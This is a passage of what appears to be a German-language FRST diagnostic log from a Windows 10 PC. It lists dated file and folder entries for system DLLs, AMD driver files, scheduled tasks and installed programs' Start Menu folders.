2017-05-07 18:11 - 2017-05-07 18:11 - 00078336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offreg.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00052736 _____ (Microsoft Corporation) C:\WINDOWS\system32\musdialoghandlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\system32\catsrvps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00047104 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00038912 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00032004 _____ C:\WINDOWS\system32\edgehtmlpluginpolicy.bin
2017-05-07 18:11 - 2017-05-07 18:11 - 00000000 ____D C:\Windows.old
2017-05-07 18:09 - 2017-05-07 18:09 - 00008192 _____ C:\WINDOWS\system32\config\userdiff
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\WINDOWS\SysWOW64\XPSViewer
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files\Reference Assemblies
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files\MSBuild
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files (x86)\Reference Assemblies
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files (x86)\MSBuild
2017-05-07 18:09 - 2017-05-07 17:13 - 00000000 ____D C:\WINDOWS\ServiceProfiles
2017-05-07 18:09 - 2017-02-10 12:26 - 01166520 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:26 - 00124624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:26 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe
2017-05-07 18:09 - 2017-02-10 12:21 - 00778936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:21 - 00103120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:21 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TsWpfWrp.exe
2017-05-07 17:23 - 2017-05-17 21:27 - 01963832 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-05-07 17:18 - 2017-05-07 17:18 - 00007623 _____ C:\WINDOWS\diagwrn.xml
2017-05-07 17:18 - 2017-05-07 17:18 - 00007623 _____ C:\WINDOWS\diagerr.xml
2017-05-07 17:17 - 2017-05-17 21:21 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-05-07 17:17 - 2017-05-07 21:26 - 00003268 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2
2017-05-07 17:17 - 2017-05-07 17:20 - 00004440 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2017-05-07 17:17 - 2017-05-07 17:17 - 00023140 _____ C:\WINDOWS\System32\Tasks\{0E0E0947-0F0F-7D0F-7D11-0E0F78051104}
2017-05-07 17:17 - 2017-05-07 17:17 - 00003556 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2017-05-07 17:17 - 2017-05-07 17:17 - 00003332 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2017-05-07 17:17 - 2017-05-07 17:17 - 00003282 _____ C:\WINDOWS\System32\Tasks\{E0FE36B0-5755-811B-E0F2-0AF91728DCC9}
2017-05-07 17:17 - 2017-05-07 17:17 - 00003084 _____ C:\WINDOWS\System32\Tasks\{522333AA-23D9-85D6-489B-224F78B46908}
2017-05-07 17:17 - 2017-05-07 17:17 - 00002736 _____ C:\WINDOWS\System32\Tasks\AutoKMS
2017-05-07 17:17 - 2017-05-07 17:17 - 00002668 _____ C:\WINDOWS\System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864
2017-05-07 17:17 - 2017-05-07 17:17 - 00002580 _____ C:\WINDOWS\System32\Tasks\SamsungMagician
2017-05-07 17:17 - 2017-05-07 17:17 - 00002388 _____ C:\WINDOWS\System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C
2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\WINDOWS\System32\Tasks\Safer-Networking
2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\WINDOWS\System32\Tasks\ASUS
2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\ProgramData\USOShared
2017-05-07 17:15 - 2017-05-07 17:15 - 00001576 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2017-05-07 17:15 - 2017-03-18 22:56 - 02233344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2017-05-07 17:14 - 2017-05-14 22:59 - 00000000 ____D C:\Users\Dino
2017-05-07 17:14 - 2017-05-07 17:16 - 00000000 ____D C:\WINDOWS\system32\config\bbimigrate
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Vorlagen
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Startmenü
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Netzwerkumgebung
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Lokale Einstellungen
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Eigene Dateien
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Druckumgebung
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Local\Verlauf
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Local\Anwendungsdaten
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Anwendungsdaten
2017-05-07 17:13 - 2017-05-17 21:20 - 00065536 _____ C:\WINDOWS\system32\spu_storage.bin
2017-05-07 17:13 - 2017-05-17 21:18 - 00000000 ____D C:\Program Files\AMD
2017-05-07 17:13 - 2017-05-16 18:16 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2017-05-07 17:13 - 2017-05-10 21:46 - 00351440 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-05-07 17:13 - 2017-05-07 17:14 - 00000000 ____D C:\Program Files (x86)\ASUS
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_ASMBSW_01_11_00.Wdf
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_TeeDriverx64_01011.Wdf
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\ProgramData\DP45977C.lfl
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\Realtek
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\Common Files\ATI Technologies
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\ASUS
2017-05-07 17:13 - 2013-07-04 03:32 - 00028672 _____ (ASUSTek Computer Inc.) C:\WINDOWS\SysWOW64\AsIO.dll
2017-05-07 17:13 - 2013-07-04 03:32 - 00015232 _____ C:\WINDOWS\SysWOW64\Drivers\AsIO.sys
2017-05-07 13:03 - 2017-05-07 21:24 - 00000000 ___DC C:\WINDOWS\Panther
2017-05-03 17:47 - 2017-05-03 17:47 - 00001256 _____ C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Update- und Datenschutzeinstellungen.lnk
2017-05-03 17:47 - 2017-05-03 17:47 - 00000000 ____D C:\Users\Dino\AppData\Local\UNP
2017-05-03 17:21 - 2017-05-07 17:16 - 00000000 ____D C:\WINDOWS\system32\UNP
2017-05-03 17:21 - 2017-05-03 17:22 - 00000000 ____D C:\Program Files\UNP
2017-05-01 12:45 - 2017-05-07 17:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Problem Report Wizard
2017-05-01 12:45 - 2017-05-01 12:45 - 00000000 ____D C:\Users\Dino\AppData\LocalLow\AMD
==================== Ein Monat: Geänderte Dateien und Ordner ========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Common Files\System
2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2017-05-19 14:20 - 2015-10-30 20:47 - 00000000 ____D C:\WINDOWS\ShellNew
2017-05-19 14:20 - 2013-08-22 15:25 - 00000076 _____ C:\WINDOWS\win.ini
2017-05-19 14:18 - 2016-12-17 13:32 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Games
2017-05-19 14:18 - 2016-12-06 18:58 - 00000000 ____D C:\Users\Dino\AppData\LocalLow\Mozilla
2017-05-19 14:16 - 2017-02-05 20:54 - 00001079 _____ C:\Users\Public\Desktop\Revo Uninstaller.lnk
2017-05-19 14:16 - 2017-02-05 20:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2017-05-19 13:51 - 2017-02-05 21:11 - 00000000 ____D C:\Program Files\Bitdefender Agent
2017-05-19 13:51 - 2015-08-16 13:47 - 00000000 ___RD C:\Users\Dino\OneDrive
2017-05-18 22:50 - 2015-04-25 17:41 - 00000000 ____D C:\Program Files (x86)\Steam
2017-05-18 21:09 - 2017-03-18 23:03 - 00000000 ___HD C:\Program Files\WindowsApps
2017-05-18 21:09 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-05-17 21:27 - 2017-03-20 06:41 - 00862082 _____ C:\WINDOWS\system32\perfh007.dat
2017-05-17 21:27 - 2017-03-20 06:41 - 00179772 _____ C:\WINDOWS\system32\perfc007.dat
2017-05-17 21:22 - 2017-03-18 13:40 - 00032768 _____ C:\WINDOWS\system32\config\ELAM
2017-05-17 21:20 - 2017-03-18 13:40 - 00786432 _____ C:\WINDOWS\system32\config\BBI
2017-05-17 21:20 - 2017-02-05 21:38 - 00013346 _____ C:\bdlog.txt
2017-05-17 21:18 - 2017-03-18 23:01 - 00000000 ____D C:\WINDOWS\INF
2017-05-17 21:18 - 2015-04-25 06:40 - 00000000 ____D C:\AMD
2017-05-16 18:06 - 2017-04-14 21:33 - 00924544 _____ (AMD) C:\WINDOWS\system32\coinst_17.10.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00551808 _____ C:\WINDOWS\system32\dgtrayicon.exe
2017-05-16 18:06 - 2017-04-14 21:33 - 00546688 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Rapidfire64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00531328 _____ C:\WINDOWS\system32\GameManager64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00478080 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\Rapidfire.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00365440 _____ C:\WINDOWS\SysWOW64\GameManager32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00278400 _____ C:\WINDOWS\system32\clinfo.exe
2017-05-16 18:06 - 2017-04-14 21:33 - 00276352 _____ C:\WINDOWS\system32\hsa-thunk64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00242048 _____ C:\WINDOWS\SysWOW64\hsa-thunk.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00191360 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantle64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00169856 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantleaxl64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00167808 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atisamu64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00150912 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantle32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00135040 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantleaxl32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00133504 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atisamu32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00044920 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\RapidFireServer64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00042368 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\RapidFireServer.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 01516416 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiadlxx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 01040768 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxy.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 01040768 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00777088 _____ (AMD) C:\WINDOWS\system32\atieclxx.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00551808 _____ (AMD) C:\WINDOWS\system32\atiesrxx.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00483712 _____ C:\WINDOWS\system32\atieah64.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00467328 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atidemgy.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00411008 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiapfxx.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00334208 _____ C:\WINDOWS\SysWOW64\atieah32.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00245112 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atig6txx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00203648 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atigktxx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00156704 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\aticfx64.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00148440 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\aticfx32.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00122744 _____ (AMD) C:\WINDOWS\system32\atimuixx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00115072 _____ C:\WINDOWS\system32\atidxx64.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00101760 _____ C:\WINDOWS\SysWOW64\atidxx32.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00068992 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\ati2erec.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 10320248 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdvlk64.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 08479104 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdvlk32.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 02536320 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amfrt64.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 02198400 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amfrt32.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 00112512 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdxc64.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 00099192 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdxc32.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00864120 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdlvr64.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00696192 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdlvr32.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00514424 _____ C:\WINDOWS\system32\amdgfxinfo64.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00360312 _____ C:\WINDOWS\SysWOW64\amdgfxinfo32.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00091520 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdmcl64.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00075136 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdmcl32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00573800 _____ C:\WINDOWS\system32\amdmiracast.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00196176 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdhcp64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00164400 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdhcp32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00139080 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdave64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00131280 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atimpc64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00131280 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdpcom64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00116072 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdave32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00102520 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdpcom32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00102512 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atimpc32.dll
2017-05-12 20:28 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\rescache
2017-05-12 19:35 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed
2017-05-12 19:35 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\Macromed
2017-05-10 21:47 - 2015-08-16 13:45 - 00000000 __RHD C:\Users\Public\AccountPictures
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\appraiser
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\ShellExperiences
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows Photo Viewer
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2017-05-09 21:42 - 2017-03-18 22:51 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-05-09 21:42 - 2015-05-01 17:30 - 00000000 ____D C:\WINDOWS\system32\MRT
2017-05-09 21:40 - 2015-05-01 17:30 - 156335152 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-05-09 21:32 - 2015-04-25 06:35 - 00000000 ____D C:\Users\Dino\AppData\Local\Packages
2017-05-09 21:23 - 2017-03-11 17:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-05-08 22:37 - 2017-03-11 17:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-05-08 21:19 - 2015-04-25 07:09 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2017-05-08 21:13 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\appcompat
2017-05-07 21:26 - 2015-08-16 13:47 - 00002419 _____ C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-05-07 21:24 - 2017-03-18 23:03 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2017-05-07 18:12 - 2017-03-18 23:03 - 00028672 _____ C:\WINDOWS\system32\config\BCD-Template
2017-05-07 18:11 - 2017-03-18 23:06 - 00000000 ____D C:\WINDOWS\Setup
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\SysWOW64\F12
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\system32\F12
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Provisioning
2017-05-07 18:11 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Dism
2017-05-07 18:09 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI
2017-05-07 18:09 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\MUI
2017-05-07 18:09 - 2017-03-18 22:56 - 00465408 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnet.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00389632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnet.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00217600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplayx.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnathlp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00061440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnathlp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpwsockx.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnsvr.exe
2017-05-07 18:09 - 2017-03-18 22:56 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpmodemx.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnsvr.exe
2017-05-07 18:09 - 2017-03-18 22:56 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplaysvr.exe
2017-05-07 18:09 - 2017-03-18 22:56 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhupnp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhpast.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhupnp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhpast.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnlobby.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnaddr.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnlobby.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnaddr.dll
2017-05-07 17:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows NT
2017-05-07 17:19 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioDatabase
2017-05-07 17:19 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Registration
2017-05-07 17:18 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\Tasks_Migrated
2017-05-07 17:17 - 2017-03-20 06:43 - 00000000 ____D C:\WINDOWS\HoloShell
2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 __RSD C:\WINDOWS\Media
2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 __RHD C:\Users\Public\Libraries
2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\USOPrivate
2017-05-07 17:17 - 2015-08-16 13:44 - 00023056 _____ C:\WINDOWS\system32\emptyregdb.dat
2017-05-07 17:16 - 2017-03-29 15:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ElsterFormular
2017-05-07 17:16 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2017-05-07 17:16 - 2017-03-14 00:20 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2017-05-07 17:16 - 2017-02-19 12:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WISO steuer Start 2017
2017-05-07 17:16 - 2017-02-05 21:15 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bitdefender 2017
2017-05-07 17:16 - 2017-01-22 16:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SHARKOON Drakonia
2017-05-07 17:16 - 2016-02-13 13:26 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WISO steuer Start 2016
2017-05-07 17:16 - 2015-08-22 17:13 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SimCity™
2017-05-07 17:16 - 2015-08-22 14:31 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin
2017-05-07 17:16 - 2015-05-24 14:37 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Unlocker
2017-05-07 17:16 - 2015-05-24 12:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Xbox 360 Accessories
2017-05-07 17:16 - 2015-05-24 12:00 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-05-07 17:16 - 2015-05-24 12:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-05-07 17:16 - 2015-04-26 15:41 - 00000000 ____D C:\WINDOWS\system32\STRING
2017-05-07 17:16 - 2015-04-26 15:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon MG5600 series Benutzerregistrierung
2017-05-07 17:16 - 2015-04-26 15:12 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2017-05-07 17:16 - 2015-04-26 14:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2017-05-07 17:16 - 2015-04-26 14:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client
2017-05-07 17:16 - 2015-04-26 13:55 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\JDownloader
2017-05-07 17:16 - 2015-04-26 13:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StarCraft II
2017-05-07 17:16 - 2015-04-26 13:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battle.net
2017-05-07 17:16 - 2015-04-25 17:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2017-05-07 17:16 - 2015-04-25 07:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CrystalDiskInfo
2017-05-07 17:16 - 2015-04-25 07:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung Magician
2017-05-07 17:16 - 2015-04-25 07:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ASUS
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\lv-LV
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\lt-LT
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\GroupPolicy
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\et-EE
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\en-GB
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\spool
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\oobe
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\lv-LV
